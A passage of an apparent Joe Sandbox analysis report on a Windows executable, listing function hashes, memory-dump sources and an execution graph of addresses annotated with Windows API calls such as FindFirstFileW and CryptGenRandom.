                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C11A36E0D6859FE7159BACD8A42AC7BB0EF86314F0841FBD499DB1D7CE296806C740
                                                                                                                                                                                                                                            Function 00007FFD9AD81A78 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.1900707928.00007FFD9AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD80000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_7ffd9ad80000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 098f4a56373fe905250b021ea999ebf387e4cbf7b0bfdc36ec0a226fa2bd02c6
                                                                                                                                                                                                                                            • Instruction ID: 025dee12c1f1e0d38595f3b5501acc0c97d8a66c45d7b4a70a997bb53977f909
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 098f4a56373fe905250b021ea999ebf387e4cbf7b0bfdc36ec0a226fa2bd02c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C11923B0DA854FE76A9B7C58656B57BE1EF56210B0D01FBE05CCB1D7E928AC09C341
                                                                                                                                                                                                                                            Function 00007FFD9AD81863 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.1900707928.00007FFD9AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD80000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_7ffd9ad80000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 80dbac03671b768975b0f560ebec5d88c42a1f523dffb692025d78b336368d15
                                                                                                                                                                                                                                            • Instruction ID: 56562e4027264fa6ed8d027a8636eead20da8ac470c258aa4fa2d174da4a90c2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80dbac03671b768975b0f560ebec5d88c42a1f523dffb692025d78b336368d15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B411D23B0CE494FE7AD965C54616F973E2DF84220B4810FBE05ECB1D7FE29E8158241
                                                                                                                                                                                                                                            Function 00007FFD9ACB3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.1899344146.00007FFD9ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_7ffd9acb0000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                            • Instruction ID: 997fdd2bf33ae35a91af1d64776fc8c427ef5541916771d309e940885d01838b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C701A73120CB0C4FD748EF0CE051AA5B3E0FB85320F10056EE58AC3691D632E881CB45

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:7.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0.5%
                                                                                                                                                                                                                                            Total number of Nodes:1119
                                                                                                                                                                                                                                            Total number of Limit Nodes:39
                                                                                                                                                                                                                                            execution_graph 38236 7ff702c6231c 38237 7ff702c6238c 38236->38237 38238 7ff702c62342 GetModuleHandleW 38236->38238 38249 7ff702c66938 EnterCriticalSection 38237->38249 38238->38237 38242 7ff702c6234f 38238->38242 38240 7ff702c66998 fflush LeaveCriticalSection 38241 7ff702c62460 38240->38241 38244 7ff702c6246c 38241->38244 38247 7ff702c62488 11 API calls 38241->38247 38242->38237 38250 7ff702c624d4 GetModuleHandleExW 38242->38250 38243 7ff702c62410 38243->38240 38245 7ff702c62396 38245->38243 38248 7ff702c643b8 16 API calls 38245->38248 38247->38244 38248->38243 38251 7ff702c624fe GetProcAddress 38250->38251 38252 7ff702c62525 38250->38252 38251->38252 38255 7ff702c62518 38251->38255 38253 7ff702c62535 38252->38253 38254 7ff702c6252f FreeLibrary 38252->38254 38253->38237 38254->38253 38255->38252 38256 7ff702c5b0fc 38273 7ff702c5aa8c 38256->38273 38260 7ff702c5b123 __scrt_acquire_startup_lock 38263 7ff702c5b148 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38260->38263 38325 7ff702c5b52c 7 API calls memcpy_s 38260->38325 38262 7ff702c5b16d 38263->38262 38264 7ff702c5b1f7 38263->38264 38326 7ff702c62574 35 API calls __BuildCatchObjectHelper 38263->38326 38281 7ff702c63fc4 38264->38281 38271 7ff702c5b220 38327 7ff702c5ac64 8 API calls 2 library calls 38271->38327 38274 7ff702c5aaae __isa_available_init 38273->38274 38328 7ff702c5e2f8 38274->38328 38277 7ff702c5aab7 38277->38260 38324 7ff702c5b52c 7 API calls memcpy_s 38277->38324 38282 7ff702c63fd4 38281->38282 38283 7ff702c5b20c 38281->38283 38377 7ff702c63c84 54 API calls 38282->38377 38285 7ff702c37e20 38283->38285 38378 7ff702c4b470 GetModuleHandleW 38285->38378 38291 7ff702c37e58 SetErrorMode GetModuleHandleW 38292 7ff702c448cc 21 API calls 38291->38292 38293 7ff702c37e7d 38292->38293 38294 7ff702c43e48 137 API calls 38293->38294 38295 7ff702c37e90 38294->38295 38296 7ff702c13d3c 126 API calls 38295->38296 38297 7ff702c37e9c 38296->38297 38298 7ff702c5a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38297->38298 38299 7ff702c37ead 38298->38299 38300 7ff702c37ebf 38299->38300 38301 7ff702c13f18 70 API calls 38299->38301 38302 7ff702c14d1c 157 API calls 38300->38302 38301->38300 38303 7ff702c37ed6 38302->38303 38304 7ff702c37eef 38303->38304 38306 7ff702c16ad0 154 API calls 38303->38306 38305 7ff702c14d1c 157 API calls 38304->38305 38307 7ff702c37eff 38305->38307 38308 7ff702c37ee7 38306->38308 38309 7ff702c37f0d 38307->38309 38312 7ff702c37f14 38307->38312 38310 7ff702c14e48 160 API calls 38308->38310 38311 7ff702c4b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38309->38311 38310->38304 38311->38312 38313 7ff702c14888 58 API calls 38312->38313 38314 7ff702c37f57 38313->38314 38315 7ff702c14fd0 268 API calls 38314->38315 38317 7ff702c37f5f 38315->38317 38316 7ff702c37f9e 38322 7ff702c5b684 GetModuleHandleW 38316->38322 38317->38316 38318 7ff702c37f8c 38317->38318 38319 7ff702c4b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38318->38319 38320 7ff702c37f93 38319->38320 38320->38316 38321 7ff702c4b57c 14 API calls 38320->38321 38321->38316 38323 7ff702c5b698 38322->38323 38323->38271 38324->38260 38325->38263 38326->38264 38327->38262 38329 7ff702c5e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38328->38329 38341 7ff702c5eb08 38329->38341 38332 7ff702c5aab3 38332->38277 38336 7ff702c645e4 38332->38336 38334 7ff702c5e318 38334->38332 38348 7ff702c5eb50 DeleteCriticalSection 38334->38348 38337 7ff702c69d4c 38336->38337 38338 7ff702c5aac0 38337->38338 38365 7ff702c666c0 38337->38365 38338->38277 38340 7ff702c5e32c 8 API calls 3 library calls 38338->38340 38340->38277 38342 7ff702c5eb10 38341->38342 38344 7ff702c5eb41 38342->38344 38346 7ff702c5e30b 38342->38346 38349 7ff702c5e678 38342->38349 38354 7ff702c5eb50 DeleteCriticalSection 38344->38354 38346->38332 38347 7ff702c5e8a4 8 API calls 3 library calls 38346->38347 38347->38334 38348->38332 38355 7ff702c5e34c 38349->38355 38352 7ff702c5e6cf InitializeCriticalSectionAndSpinCount 38353 7ff702c5e6bb 38352->38353 38353->38342 38354->38346 38359 7ff702c5e3b2 38355->38359 38361 7ff702c5e3ad 38355->38361 38356 7ff702c5e47a 38358 7ff702c5e489 GetProcAddress 38356->38358 38356->38359 38357 7ff702c5e3e5 LoadLibraryExW 38360 7ff702c5e40b GetLastError 38357->38360 38357->38361 38358->38359 38362 7ff702c5e4a1 38358->38362 38359->38352 38359->38353 38360->38361 38363 7ff702c5e416 LoadLibraryExW 38360->38363 38361->38356 38361->38357 38361->38359 38364 7ff702c5e458 FreeLibrary 38361->38364 38362->38359 38363->38361 38364->38361 38376 7ff702c66938 EnterCriticalSection 38365->38376 38367 7ff702c666d0 38368 7ff702c68050 32 API calls 38367->38368 38369 7ff702c666d9 38368->38369 38370 7ff702c666e7 38369->38370 38371 7ff702c664d0 34 API calls 38369->38371 38372 7ff702c66998 fflush LeaveCriticalSection 38370->38372 38373 7ff702c666e2 38371->38373 38374 7ff702c666f3 38372->38374 38375 7ff702c665bc GetStdHandle GetFileType 38373->38375 38374->38337 38375->38370 38377->38283 38379 7ff702c37e45 38378->38379 38380 7ff702c4b496 GetProcAddress 38378->38380 38383 7ff702c17a68 38379->38383 38381 7ff702c4b4cb GetProcAddress 38380->38381 38382 7ff702c4b4ae 38380->38382 38381->38379 38382->38381 38384 7ff702c17a76 38383->38384 38404 7ff702c62ae4 38384->38404 38386 7ff702c17a80 38387 7ff702c62ae4 setbuf 60 API calls 38386->38387 38388 7ff702c17a94 38387->38388 38413 7ff702c17b44 GetStdHandle GetFileType 38388->38413 38391 7ff702c17b44 3 API calls 38392 7ff702c17aae 38391->38392 38393 7ff702c17b44 3 API calls 38392->38393 38394 7ff702c17abe 38393->38394 38396 7ff702c17aeb 38394->38396 38416 7ff702c62abc 31 API calls 2 library calls 38394->38416 38395 7ff702c17b12 38403 7ff702c1cd78 SetConsoleCtrlHandler 38395->38403 38396->38395 38418 7ff702c62abc 31 API calls 2 library calls 38396->38418 38398 7ff702c17adf 38417 7ff702c62b40 33 API calls 3 library calls 38398->38417 38401 7ff702c17b06 38419 7ff702c62b40 33 API calls 3 library calls 38401->38419 38405 7ff702c62ae9 38404->38405 38406 7ff702c67ee8 38405->38406 38409 7ff702c67f23 38405->38409 38420 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 38406->38420 38408 7ff702c67eed 38421 7ff702c64e1c 31 API calls _invalid_parameter_noinfo 38408->38421 38422 7ff702c67d98 60 API calls 2 library calls 38409->38422 38412 7ff702c67ef8 38412->38386 38414 7ff702c17b61 GetConsoleMode 38413->38414 38415 7ff702c17a9e 38413->38415 38414->38415 38415->38391 38416->38398 38417->38396 38418->38401 38419->38395 38420->38408 38421->38412 38422->38412 38423 7ff702c01884 38555 7ff702c334e4 38423->38555 38426 7ff702c01926 38428 7ff702c0195b 38426->38428 38619 7ff702c33f98 63 API calls 2 library calls 38426->38619 38427 7ff702c334e4 CompareStringW 38429 7ff702c018a6 38427->38429 38435 7ff702c01970 38428->38435 38620 7ff702c22ed8 100 API calls 3 library calls 38428->38620 38431 7ff702c334e4 CompareStringW 38429->38431 38437 7ff702c018b9 38429->38437 38431->38437 38434 7ff702c01915 38618 7ff702c1ca40 61 API calls _CxxThrowException 38434->38618 38438 7ff702c019b8 38435->38438 38621 7ff702c449f4 48 API calls 38435->38621 38437->38426 38617 7ff702c01168 8 API calls 2 library calls 38437->38617 38559 7ff702c05450 38438->38559 38440 7ff702c019b0 38622 7ff702c18444 54 API calls fflush 38440->38622 38446 7ff702c072c4 76 API calls 38453 7ff702c01a12 38446->38453 38447 7ff702c01ae6 38593 7ff702c07514 38447->38593 38448 7ff702c01b04 38597 7ff702c16c94 38448->38597 38451 7ff702c01af2 38452 7ff702c07514 72 API calls 38451->38452 38454 7ff702c01aff 38452->38454 38453->38447 38453->38448 38455 7ff702c5a610 _handle_error 8 API calls 38454->38455 38456 7ff702c02f97 38455->38456 38457 7ff702c01b13 38613 7ff702c07148 38457->38613 38459 7ff702c01c71 38460 7ff702c01ca7 38459->38460 38461 7ff702c063e8 8 API calls 38459->38461 38462 7ff702c01cd5 38460->38462 38463 7ff702c01ce4 38460->38463 38464 7ff702c01c91 38461->38464 38467 7ff702c5a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38462->38467 38465 7ff702c5a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38463->38465 38466 7ff702c049b8 99 API calls 38464->38466 38471 7ff702c01cee 38465->38471 38468 7ff702c01c9d 38466->38468 38467->38471 38469 7ff702c063e8 8 API calls 38468->38469 38469->38460 38470 7ff702c01d50 38473 7ff702c5a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38470->38473 38471->38470 38472 7ff702c4de30 72 API calls 38471->38472 38472->38470 38474 7ff702c01d62 38473->38474 38475 7ff702c4dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38474->38475 38476 7ff702c01d7b 38474->38476 38475->38476 38477 7ff702c52bcc 66 API calls 38476->38477 38478 7ff702c01dba 38477->38478 38551 7ff702c2ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38478->38551 38479 7ff702c01e1c 38481 7ff702c010c0 8 API calls 38479->38481 38483 7ff702c01e5d 38479->38483 38480 7ff702c01dde std::bad_alloc::bad_alloc 38480->38479 38482 7ff702c5ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38480->38482 38481->38483 38482->38479 38484 7ff702c0a410 159 API calls 38483->38484 38549 7ff702c01ef4 38483->38549 38484->38549 38485 7ff702c02ccc 38486 7ff702c02d0c 38485->38486 38550 7ff702c28c80 72 API calls 38485->38550 38487 7ff702c4de30 72 API calls 38486->38487 38496 7ff702c02d21 38486->38496 38487->38496 38488 7ff702c02d86 38494 7ff702c449f4 48 API calls 38488->38494 38529 7ff702c02dd0 38488->38529 38489 7ff702c449f4 48 API calls 38547 7ff702c02005 38489->38547 38490 7ff702c26688 48 API calls 38490->38549 38491 7ff702c18444 54 API calls 38491->38547 38492 7ff702c05e70 169 API calls 38492->38547 38493 7ff702c0a504 208 API calls 38493->38529 38498 7ff702c02d9e 38494->38498 38495 7ff702c080e4 192 API calls 38495->38529 38496->38488 38499 7ff702c449f4 48 API calls 38496->38499 38497 7ff702c0e6c8 157 API calls 38497->38549 38501 7ff702c18444 54 API calls 38498->38501 38503 7ff702c02d6c 38499->38503 38500 7ff702c05928 237 API calls 38500->38547 38504 7ff702c02da6 38501->38504 38502 7ff702c27c7c 127 API calls 38502->38529 38505 7ff702c449f4 48 API calls 38503->38505 38512 7ff702c21c24 12 API calls 38504->38512 38509 7ff702c02d79 38505->38509 38506 7ff702c1e21c 63 API calls 38506->38547 38507 7ff702c01168 8 API calls 38507->38529 38508 7ff702c0b540 147 API calls 38508->38549 38510 7ff702c18444 54 API calls 38509->38510 38510->38488 38511 7ff702c265b4 48 API calls 38511->38549 38512->38529 38513 7ff702c24554 16 API calls 38513->38549 38514 7ff702c218ac 15 API calls 38514->38549 38515 7ff702c4ae50 71 API calls 38519 7ff702c02e39 38515->38519 38516 7ff702c033b4 64 API calls 38516->38529 38517 7ff702c21998 138 API calls 38517->38549 38518 7ff702c05db4 46 API calls 38518->38549 38519->38515 38520 7ff702c1ca40 61 API calls 38519->38520 38519->38529 38520->38529 38521 7ff702c06188 231 API calls 38521->38529 38522 7ff702c21e80 15 API calls 38522->38549 38523 7ff702c27c7c 127 API calls 38523->38549 38524 7ff702c21930 11 API calls 38524->38549 38525 7ff702c03f74 138 API calls 38525->38529 38526 7ff702c0b540 147 API calls 38526->38547 38527 7ff702c449f4 48 API calls 38527->38529 38528 7ff702c3ba9c 195 API calls 38528->38529 38529->38493 38529->38495 38529->38502 38529->38507 38529->38516 38529->38519 38529->38521 38529->38525 38529->38527 38529->38528 38531 7ff702c18444 54 API calls 38529->38531 38530 7ff702c05004 49 API calls 38530->38549 38531->38529 38532 7ff702c0a4d0 12 API calls 38532->38549 38533 7ff702c0571c 12 API calls 38533->38549 38534 7ff702c01168 8 API calls 38534->38549 38535 7ff702c4d48c 58 API calls 38535->38549 38536 7ff702c0a410 159 API calls 38536->38549 38537 7ff702c05e70 169 API calls 38537->38549 38538 7ff702c19be0 14 API calls 38538->38549 38539 7ff702c4c0a8 10 API calls 38539->38549 38540 7ff702c26378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38540->38549 38541 7ff702c397f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38541->38549 38542 7ff702c1cbd0 75 API calls 38542->38549 38543 7ff702c25c0c 237 API calls 38543->38549 38544 7ff702c25d40 237 API calls 38544->38549 38545 7ff702c4b6d0 73 API calls 38545->38547 38546 7ff702c06114 216 API calls 38546->38549 38547->38489 38547->38491 38547->38492 38547->38500 38547->38506 38547->38526 38547->38545 38547->38549 38548 7ff702c25708 237 API calls 38548->38549 38549->38485 38549->38490 38549->38497 38549->38508 38549->38511 38549->38513 38549->38514 38549->38517 38549->38518 38549->38522 38549->38523 38549->38524 38549->38530 38549->38532 38549->38533 38549->38534 38549->38535 38549->38536 38549->38537 38549->38538 38549->38539 38549->38540 38549->38541 38549->38542 38549->38543 38549->38544 38549->38546 38549->38547 38549->38548 38552 7ff702c2a250 237 API calls 38549->38552 38553 7ff702c10d60 237 API calls 38549->38553 38554 7ff702c2aae0 237 API calls 38549->38554 38550->38486 38551->38480 38552->38549 38553->38547 38554->38547 38556 7ff702c334f6 38555->38556 38557 7ff702c01893 38556->38557 38623 7ff702c4dac0 CompareStringW 38556->38623 38557->38427 38557->38437 38562 7ff702c0546f setbuf 38559->38562 38560 7ff702c0554a memcpy_s 38664 7ff702c4c0a8 GetSystemTime SystemTimeToFileTime 38560->38664 38562->38560 38573 7ff702c05588 memcpy_s 38562->38573 38563 7ff702c05583 38653 7ff702c06eb8 38563->38653 38568 7ff702c0681c 54 API calls 38568->38563 38569 7ff702c056e9 38660 7ff702c46f68 38569->38660 38571 7ff702c056f6 38572 7ff702c5a610 _handle_error 8 API calls 38571->38572 38574 7ff702c019df 38572->38574 38573->38563 38624 7ff702c03210 38573->38624 38630 7ff702c17088 38573->38630 38634 7ff702c0681c 38573->38634 38645 7ff702c47a24 38573->38645 38667 7ff702c0571c 38573->38667 38675 7ff702c14380 14 API calls 38573->38675 38579 7ff702c072c4 38574->38579 38580 7ff702c072eb 38579->38580 38817 7ff702c188dc 38580->38817 38582 7ff702c07302 38821 7ff702c3915c 38582->38821 38584 7ff702c0730f 38833 7ff702c37044 38584->38833 38587 7ff702c5a444 new 4 API calls 38588 7ff702c073e3 38587->38588 38590 7ff702c073f5 memcpy_s 38588->38590 38849 7ff702c2894c 38588->38849 38838 7ff702c19be0 38590->38838 38594 7ff702c07539 38593->38594 38942 7ff702c3922c 38594->38942 38598 7ff702c16cbc 38597->38598 38599 7ff702c16d45 38597->38599 38601 7ff702c16cd9 38598->38601 38953 7ff702c39f78 8 API calls 2 library calls 38598->38953 38600 7ff702c16d83 38599->38600 38602 7ff702c16d69 38599->38602 38958 7ff702c39f78 8 API calls 2 library calls 38599->38958 38600->38457 38604 7ff702c16cf3 38601->38604 38954 7ff702c39f78 8 API calls 2 library calls 38601->38954 38602->38600 38959 7ff702c39f78 8 API calls 2 library calls 38602->38959 38607 7ff702c16d0d 38604->38607 38955 7ff702c39f78 8 API calls 2 library calls 38604->38955 38609 7ff702c16d2b 38607->38609 38956 7ff702c39f78 8 API calls 2 library calls 38607->38956 38609->38600 38957 7ff702c39f78 8 API calls 2 library calls 38609->38957 38614 7ff702c07162 38613->38614 38615 7ff702c07167 38613->38615 38960 7ff702c06c64 130 API calls _handle_error 38614->38960 38617->38434 38618->38426 38619->38428 38620->38435 38621->38440 38622->38438 38623->38557 38625 7ff702c032e9 38624->38625 38626 7ff702c03231 38624->38626 38625->38573 38626->38625 38676 7ff702c14380 14 API calls 38626->38676 38628 7ff702c0329c 38628->38625 38677 7ff702c22a20 22 API calls 2 library calls 38628->38677 38631 7ff702c170a4 38630->38631 38632 7ff702c170c5 38631->38632 38678 7ff702c28558 10 API calls 2 library calls 38631->38678 38632->38573 38679 7ff702c06714 38634->38679 38636 7ff702c06836 38637 7ff702c06853 38636->38637 38690 7ff702c648c0 31 API calls _invalid_parameter_noinfo 38636->38690 38637->38573 38639 7ff702c0684b 38639->38637 38640 7ff702c068a9 std::bad_alloc::bad_alloc 38639->38640 38691 7ff702c5ba34 RtlPcToFileHeader RaiseException 38640->38691 38642 7ff702c068c4 38692 7ff702c07188 12 API calls 38642->38692 38644 7ff702c068eb 38644->38573 38646 7ff702c47a4f 38645->38646 38651 7ff702c47a59 38645->38651 38646->38573 38647 7ff702c47a7c 38729 7ff702c4b6d0 73 API calls _Init_thread_footer 38647->38729 38650 7ff702c47b1c 60 API calls 38650->38651 38651->38646 38651->38647 38651->38650 38697 7ff702c471fc 38651->38697 38730 7ff702c141b0 14 API calls 2 library calls 38651->38730 38654 7ff702c06ee6 38653->38654 38659 7ff702c06f5c 38653->38659 38806 7ff702c49f64 8 API calls __BuildCatchObjectHelper 38654->38806 38656 7ff702c06efb 38657 7ff702c06f2f 38656->38657 38656->38659 38657->38656 38807 7ff702c07188 12 API calls 38657->38807 38659->38569 38661 7ff702c46fb4 38660->38661 38662 7ff702c46f8a 38660->38662 38662->38661 38663 7ff702c24538 FindClose 38662->38663 38663->38662 38665 7ff702c5a610 _handle_error 8 API calls 38664->38665 38666 7ff702c05576 38665->38666 38666->38568 38668 7ff702c05742 38667->38668 38670 7ff702c0575d 38667->38670 38668->38670 38812 7ff702c33520 12 API calls 2 library calls 38668->38812 38808 7ff702c33610 38670->38808 38673 7ff702c057fc 38673->38573 38675->38573 38676->38628 38677->38625 38678->38631 38680 7ff702c06738 38679->38680 38689 7ff702c067a7 __BuildCatchObjectHelper 38679->38689 38681 7ff702c06765 38680->38681 38693 7ff702c1ca6c 48 API calls 3 library calls 38680->38693 38683 7ff702c067e1 38681->38683 38684 7ff702c06786 38681->38684 38683->38689 38696 7ff702c1cb64 8 API calls 38683->38696 38684->38689 38695 7ff702c1cb64 8 API calls 38684->38695 38685 7ff702c06759 38694 7ff702c1cb64 8 API calls 38685->38694 38689->38636 38690->38639 38691->38642 38692->38644 38693->38685 38702 7ff702c47217 setbuf 38697->38702 38713 7ff702c4729c 38702->38713 38724 7ff702c4725a 38702->38724 38726 7ff702c473c5 38702->38726 38738 7ff702c24554 38702->38738 38703 7ff702c47453 38704 7ff702c47476 38703->38704 38705 7ff702c47464 38703->38705 38714 7ff702c47496 38704->38714 38735 7ff702c24538 38704->38735 38752 7ff702c47c38 55 API calls 3 library calls 38705->38752 38707 7ff702c476ef 38707->38724 38755 7ff702c28558 10 API calls 2 library calls 38707->38755 38709 7ff702c47471 38709->38704 38712 7ff702c47342 38712->38707 38722 7ff702c47656 38712->38722 38712->38724 38753 7ff702c14380 14 API calls 38712->38753 38716 7ff702c473bb 38713->38716 38718 7ff702c4732e 38713->38718 38721 7ff702c24554 16 API calls 38714->38721 38714->38724 38746 7ff702c5a444 38716->38746 38718->38712 38719 7ff702c4734a 38718->38719 38720 7ff702c4737e 38719->38720 38719->38724 38744 7ff702c14380 14 API calls 38719->38744 38720->38724 38745 7ff702c1cbd0 75 API calls 38720->38745 38721->38724 38722->38707 38722->38724 38727 7ff702c47723 38722->38727 38756 7ff702c5a610 38724->38756 38731 7ff702c245cc 38726->38731 38754 7ff702c0c214 8 API calls 2 library calls 38727->38754 38730->38651 38733 7ff702c245ed 38731->38733 38732 7ff702c246ec 15 API calls 38732->38733 38733->38732 38734 7ff702c246b2 38733->38734 38734->38703 38734->38712 38736 7ff702c24549 FindClose 38735->38736 38737 7ff702c2454f 38735->38737 38736->38737 38737->38714 38739 7ff702c24570 38738->38739 38740 7ff702c24574 38739->38740 38765 7ff702c246ec 38739->38765 38740->38713 38743 7ff702c2458d FindClose 38743->38740 38744->38720 38745->38724 38749 7ff702c5a44f 38746->38749 38747 7ff702c5a47a 38747->38726 38749->38747 38793 7ff702c636c0 38749->38793 38796 7ff702c5b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38749->38796 38797 7ff702c5b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38749->38797 38752->38709 38753->38722 38754->38724 38755->38724 38757 7ff702c5a61a 38756->38757 38758 7ff702c4776f 38757->38758 38759 7ff702c5a6a0 IsProcessorFeaturePresent 38757->38759 38758->38651 38760 7ff702c5a6b7 38759->38760 38804 7ff702c5a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38760->38804 38762 7ff702c5a6ca 38805 7ff702c5a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38762->38805 38766 7ff702c24705 setbuf 38765->38766 38767 7ff702c247a4 FindNextFileW 38766->38767 38768 7ff702c24733 FindFirstFileW 38766->38768 38769 7ff702c247ae GetLastError 38767->38769 38777 7ff702c2478b 38767->38777 38770 7ff702c24749 38768->38770 38768->38777 38769->38777 38778 7ff702c34534 38770->38778 38772 7ff702c5a610 _handle_error 8 API calls 38774 7ff702c24587 38772->38774 38774->38740 38774->38743 38775 7ff702c2477a GetLastError 38775->38777 38776 7ff702c2475f FindFirstFileW 38776->38775 38776->38777 38777->38772 38779 7ff702c34549 setbuf 38778->38779 38789 7ff702c345a2 38779->38789 38790 7ff702c3472c CharUpperW 38779->38790 38781 7ff702c5a610 _handle_error 8 API calls 38783 7ff702c2475b 38781->38783 38782 7ff702c34579 38791 7ff702c34760 CharUpperW 38782->38791 38783->38775 38783->38776 38785 7ff702c34592 38786 7ff702c34629 GetCurrentDirectoryW 38785->38786 38787 7ff702c3459a 38785->38787 38786->38789 38792 7ff702c3472c CharUpperW 38787->38792 38789->38781 38790->38782 38791->38785 38792->38789 38798 7ff702c63700 38793->38798 38803 7ff702c66938 EnterCriticalSection 38798->38803 38800 7ff702c6370d 38801 7ff702c66998 fflush LeaveCriticalSection 38800->38801 38802 7ff702c636d2 38801->38802 38802->38749 38804->38762 38806->38656 38807->38657 38811 7ff702c33626 setbuf wcschr 38808->38811 38809 7ff702c5a610 _handle_error 8 API calls 38810 7ff702c057e1 38809->38810 38810->38673 38813 7ff702c348bc 38810->38813 38811->38809 38812->38670 38814 7ff702c348cb setbuf 38813->38814 38815 7ff702c5a610 _handle_error 8 API calls 38814->38815 38816 7ff702c3493a 38815->38816 38816->38673 38818 7ff702c18919 38817->38818 38854 7ff702c44b14 38818->38854 38820 7ff702c18954 memcpy_s 38820->38582 38822 7ff702c39199 38821->38822 38859 7ff702c5a480 38822->38859 38825 7ff702c5a444 new 4 API calls 38826 7ff702c391cf 38825->38826 38827 7ff702c391e1 38826->38827 38828 7ff702c188dc 8 API calls 38826->38828 38829 7ff702c5a444 new 4 API calls 38827->38829 38828->38827 38830 7ff702c391f7 38829->38830 38831 7ff702c188dc 8 API calls 38830->38831 38832 7ff702c39209 38830->38832 38831->38832 38832->38584 38834 7ff702c188dc 8 API calls 38833->38834 38835 7ff702c37063 38834->38835 38867 7ff702c372c0 38835->38867 38871 7ff702c1901c CryptAcquireContextW 38838->38871 38842 7ff702c19c2a 38881 7ff702c49ce4 38842->38881 38846 7ff702c19c5b __BuildCatchObjectHelper 38847 7ff702c5a610 _handle_error 8 API calls 38846->38847 38848 7ff702c01a01 38847->38848 38848->38446 38898 7ff702c47d80 38849->38898 38855 7ff702c44b2b 38854->38855 38856 7ff702c44b26 38854->38856 38855->38820 38858 7ff702c44b38 8 API calls _handle_error 38856->38858 38858->38855 38862 7ff702c5a444 38859->38862 38860 7ff702c391be 38860->38825 38861 7ff702c636c0 new 2 API calls 38861->38862 38862->38860 38862->38861 38865 7ff702c5b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38862->38865 38866 7ff702c5b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38862->38866 38868 7ff702c372dd 38867->38868 38869 7ff702c07325 38868->38869 38870 7ff702c5a480 4 API calls 38868->38870 38869->38587 38869->38590 38870->38869 38872 7ff702c19057 CryptGenRandom CryptReleaseContext 38871->38872 38873 7ff702c1907e 38871->38873 38872->38873 38874 7ff702c19089 38872->38874 38875 7ff702c19c9c 11 API calls 38873->38875 38876 7ff702c19c9c 38874->38876 38875->38874 38877 7ff702c4c0a8 10 API calls 38876->38877 38878 7ff702c19cc5 38877->38878 38891 7ff702c62d74 38878->38891 38882 7ff702c19c49 38881->38882 38883 7ff702c49d15 __BuildCatchObjectHelper 38881->38883 38885 7ff702c49b70 38882->38885 38883->38882 38894 7ff702c49d74 38883->38894 38886 7ff702c49bd9 memcpy_s 38885->38886 38890 7ff702c49bad memcpy_s 38885->38890 38887 7ff702c49d74 8 API calls 38886->38887 38888 7ff702c49c07 38887->38888 38888->38846 38889 7ff702c49d74 8 API calls 38889->38886 